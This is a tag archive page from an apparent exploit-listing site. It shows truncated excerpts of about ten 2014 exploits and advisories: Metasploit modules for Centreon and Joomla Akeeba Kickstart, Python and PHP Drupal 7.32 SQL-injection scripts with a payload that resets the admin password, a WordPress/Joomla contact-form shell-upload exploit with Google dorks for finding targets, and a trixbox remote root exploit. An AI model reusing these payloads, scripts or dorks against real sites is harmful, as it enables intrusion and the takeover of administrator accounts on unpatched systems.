Tags archives: unix

 

0

Centreon SQL / Command Injection

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require ‘msf/core’   class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking   include Msf::Exploit::Remote::HttpClient   def initialize(info = {}) super(update_info(info, ‘Name’ => ‘Centreon SQL and Command Injection’, ‘Description’ => %q{ This module exploits several vulnerabilities on Centreon 2.5.1 and prior and Centreon Enterprise [...]

 

0

WordPress / Joomla Creative Contact Form 0.9.7 Shell Upload

#!/usr/bin/python # # Exploit Name: Wordpress and Joomla Creative Contact Form Shell Upload Vulnerability # Wordpress plugin version: <= 0.9.7 # Joomla extension version: <= 2.0.0 # # Vulnerability discovered by Gianni Angelozzi # # Exploit written by Claudio Viviani # # Dork google wordpress: inurl:inurl:sexy-contact-form # Dork google joomla : inurl:com_creativecontactform # # Tested [...]

 

0

WordPress CP Multi View Event Calendar 1.01 SQL Injection

######################   # Exploit Title : CP Multi View Event Calendar 1.01 SQL Injection Vulnerability   # Exploit Author : Claudio Viviani   # Software Link : https://downloads.wordpress.org/plugin/cp-multi-view-calendar.zip   # Date : 2014-10-23   # Tested on : Windows 7 / Mozilla Firefox Windows 7 / sqlmap (0.8-1) Linux / Mozilla Firefox Linux / sqlmap [...]

 

0

WordPress Database Manager 2.7.1 Command Injection / Credential Leak

Title: Vulnerabilities in WordPress Database Manager v2.7.1 Author: Larry W. Cashdollar, @_larry0 Date: 10/13/2014 Download: https://wordpress.org/plugins/wp-dbmanager/ Downloads: 1,171,358 Vendor: Lester Chan, https://profiles.wordpress.org/gamerz/ Contacted: 10/13/2014, Vulnerabilities addressed in v2.7.2. Full Advisory: http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-dbmanager-2.7.1/index.html CVE: 2014-8334,2014-8335 OSVDBID: 113508,113507,113509   Description: “Allows you to optimize database, repair database, backup database, restore database, delete backup database , drop/empty tables and [...]

 

0

Joomla Akeeba Kickstart Unserialize Remote Code Execution

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require ‘msf/core’ require ‘rex/zip’ require ‘json’   class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking   include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::FileDropper   def initialize(info={}) super(update_info(info, ‘Name’ => “Joomla Akeeba Kickstart Unserialize Remote Code Execution”, ‘Description’ => %q{ This module exploits a vulnerability [...]

 

0

Drupal Core 7.32 SQL Injection

#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005 #Creditz to https://www.reddit.com/user/fyukyuk import urllib2,sys from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py host = sys.argv[1] user = sys.argv[2] password = sys.argv[3] if len(sys.argv) != 3: print “host username password” print “http://nope.io admin wowsecure” hash = DrupalHash(“$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML”, password).get_hash() target = ‘%s/?q=node&destination=node’ % host post_data = “name[0%20;update+users+set+name%3d'" +user +"'+,+pass+%3d+'" [...]

 

0

Drupal Core 7.32 SQL Injection

<?php #—————————————————————————–# # Exploit Title: Drupal core 7.x – SQL Injection # # Date: Oct 16 2014 # # Exploit Author: Dustin Dörr # # Software Link: http://www.drupal.com/ # # Version: Drupal core 7.x versions prior to 7.32 # # CVE: CVE-2014-3704 # #—————————————————————————–#   $url = ‘http://www.example.com’; $post_data = “name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in”; [...]

 

0

Fonality Trixbox CE 2.8.0.4 Command Execution

#!/usr/bin/perl # # Title: Fonality trixbox CE remote root exploit # Author: Simo Ben youssef # Contact: Simo_at_Morxploit_com # Discovered & Coded: 2 June 2014 # Published: 17 October 2014 # MorXploit Research # http://www.MorXploit.com # Software: trixbox CE # Version: trixbox-2.8.0.4.iso # Vendor url: http://www.fonality.com/ # Download: http://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/ # Vulnerable file: maint/modules/home/index.php # # [...]

 

0

Drupal 7.X SQL Injection

#!/usr/bin/python # # # Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005 # Inspired by yukyuk’s P.o.C (https://www.reddit.com/user/fyukyuk) # # Tested on Drupal 7.31 with BackBox 3.x # # This material is intended for educational # purposes only and the author can not be held liable for # any kind of damages done whatsoever to your machine, [...]

 

0

WordPress MaxButtons 1.26.0 Cross Site Scripting

Advisory ID: HTB23237 Product: MaxButtons WordPress plugin Vendor: Max Foundry Vulnerable Version(s): 1.26.0 and probably prior Tested Version: 1.26.0 Advisory Publication: September 24, 2014 [without technical details] Vendor Notification: September 24, 2014 Vendor Patch: October 2, 2014 Public Disclosure: October 15, 2014 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2014-7181 Risk Level: Low CVSSv2 Base [...]